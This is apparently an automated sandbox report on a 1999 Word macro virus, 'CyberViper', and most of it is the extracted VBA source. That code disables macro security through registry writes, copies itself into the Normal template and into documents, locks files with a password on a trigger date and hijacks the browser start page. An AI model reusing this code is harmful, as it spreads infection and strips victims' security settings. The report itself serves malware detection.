Risk Score: 260 (MALICIOUS)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
This OLE file contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close, indicating a macro virus. The script attempts to disable macro security by writing to registry keys: 'HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level' and 'HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Options\EnableMacroVirusProtection'. It also attempts to export and import a component named 'CyberViper' to 'c:\CV.sys', suggesting an attempt at self-propagation or payload delivery.
Heuristics (5)

- ClamAV: Js.Joke.RJump-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Js.Joke.RJump-1
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18222 bytes |

SHA-256: c49d8cb59ec3fdebef58d67a0999c3b785ef78585a5075dfa440fe8dfe79e60a

Detection:
- ClamAV: Js.Joke.RJump-1
- Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "CyberViper"
'@¡ä^PÏ9‘™šª
Sub AutoOpen()
'pWåÀ«s²WgvÜ8¡e4E/v
'×v§„†|fpU+Pã,nh�?~S�Œ?
Rem Macro.Word97.CyberViper
Rem Copyright by Wit AKA CyberViper 1999
Rem ( My first macro virus )
Rem ( Stealth, Polimorf )
'4*�ßMeÒ
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
ShowVisualBasicEditor = False
With System
.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Options", "EnableMacroVirusProtection") = 0&
End With
'C•¨5¢³¼v0ƒ’+r7=^æ˜Vs~,{wÝVB…d†oS- h�Ðt–
With Options
.VirusProtection = (((1 * 1) - 1) / 10)
.SaveNormalPrompt = (((1 * 1) - 1) / 10)
.ConfirmConversions = (((1 * 1) - 1) / 10)
End With
TmpFileName = "c:\CV.sys"
'~ uY¶ÒÄC5">kEãΔ±=S%ż¾bz�À�HIh’d‰u’*�Ià
Call CyberMutate
'3•AÙ3xVζV¦S1&
If ThisDocument = NormalTemplate Then
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "CyberViper" Then GoTo EndFind
'5ç§#“44¿X)[l\ÝãpW@@¡rr
Next I
NormalTemplate.VBProject.VBComponents("CyberViper").Export (TmpFileName)
'e ´ÈW¬pÂ
'Œ‹�1®S+Wàa¡hiaJJt›P©•˜/(>Qo”YÇÓ‰m
ActiveDocument.VBProject.VBComponents.Import TmpFileName
ActiveDocument.Saved = False
Else
'plIÏ>p™�±8`!¼Ø[MÞEsh`㓉:Ó&¾
For I = 1 To NormalTemplate.VBProject.VBComponents.Count
'¸”™U…¾Ë2Œs.z«ƒqÝä–Š›1DX#>t��¼(q+^˜‡—aÕº“
If NormalTemplate.VBProject.VBComponents(I).Name = "CyberViper" Then GoTo EndFind
'¯ÓLgŽgH“�;,žÇ tEƒâ¹l€�¦'¡Ód7uºgrµ
'[O€Rd(€IÌ•¶ÙbŒ0žrà6Øœe= Kæ:%e�Ø‹
'—¹®©¸S�…‘Xsf⇔}&k;¢>Gk3›
'O–¬U““æÚQ¹q�‚ƒ
Next I
'À¦ÕÏs8Þ¿«p#A@…q5W ɃEÓj`ºKyOÏšjm̕ڇbÍS
Application.VBE.ActiveVBProject.VBComponents("CyberViper").Export (TmpFileName)
NormalTemplate.VBProject.VBComponents.Import TmpFileName
'ižCv?âV+À®R¾ÎäV|Ö
NormalTemplate.Saved = False
NormalTemplate.Save
'5=<
'„äy»]/Ï“ÌÁ¹Ø*ÄMV*ÔåT‹dJH9˜•Ë1Hž|YÆ]âo¾Á
End If
EndFind:
'ar>›3Iª„
'vÇK²ÓKäáΈ¢{? šÊi*…*jz[á"¢šŠ%¯^äZh
'‰V”I/Ó6¢ÔNÝÉx‚¹Æ
Kill TmpFileName
'Ŧ°çcƒr«CtŒÂŒu…M›�¨Ñj\Z>‰L”hÏ F¨µš
If Month(Now()) = 4 And Day(Now()) = 15 Then
ActiveDocument.Password = "-=CyberViper=-"
'@+P·Þe¨¾'¾€I˜ÕÝ¢"¤à!Þ.Z”Á(*�^r
'…BW1ãX›]Ê_¿B\.‚z—&_;a¸�àÅŽ™FÔ
ActiveDocument.Saved = False
'�ªÖÆ
'É-:àÆÄçO¤�
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page") = "file://C:\CV.HTM"
Open "c:\CV.HTM" For Output As #1
'7B)®Š
Print #1, "<HTML><HEAD></HEAD><script LANGUAGE=" + Chr(34) + "JavaScript1.2" + Chr(34) + ">"
Print #1, "a=1;setInterval(" + Chr(34) + "J()" + Chr(34) + ",10);function J(){a=a+.1;"
'œ¡TWÅÄ•åÖM«ä
Print #1, "self.moveBy((Math.random()*a*2 -a),(Math.random()*a*2)-a);}</script></BODY></HTML>"
'z`.q’¸”¢Ás¿°ª²Fº-QÞÃKDOÙSS®¤º·
Close #1
End If
End Sub
Sub FileTemplates()
'·p|‚
Application.EnableCancelKey = wdCancelDisabled
Options.VirusProtection = (((1 * 1) - 1) / 10)
'}µ¶oÔµ1ž®
Options.ConfirmConversions = (((1 * 1) - 1) / 10)
End Sub
'•¤”+È+>_wtË+ÓO*
Sub ToolsMacro()
Call FileTemplates
End Sub
Sub ViewVBCode()
Call FileTemplates
End Sub
Sub AutoClose()
Call AutoOpen
End Sub
Sub AutoNew()
Call AutoOpen
End Sub
Sub FileSaveAs()
'tc¬J(Ñ({³·ÄI}ÍÅr|e
Call AutoOpen
'Ü}°oN˜Ž|¡¹
'žIE”0{ÕT½kYמ�
'“Y\º"¸Â)r̾jàÎ+Ýhˆ¹*–
Dialogs(wdDialogFileSaveAs).Show
End Sub
'/rc®^¿>–ßPÛ6äž—Ô’Q
Sub FileSave()
';(ªÈ‡Àäˆ-�a
Call AutoOpen
ActiveDocument.Save
';¥
End Sub
'ÁHß-,¾k
'‡·À
Sub CyberMutate()
Call ClearRem
For C2 = 1 To 50
U2 = ThisDocument.VBProject.VBComponents("CyberViper").CodeModule.CountOfLines
M1 = Int((U2 * Rnd) + 1)
F4 = Int((40 * Rnd) + 1)
CRem = "'"
'nÄU§
For C3 = 1 To F4
'w·Q
CRem = CRem + C
... (truncated)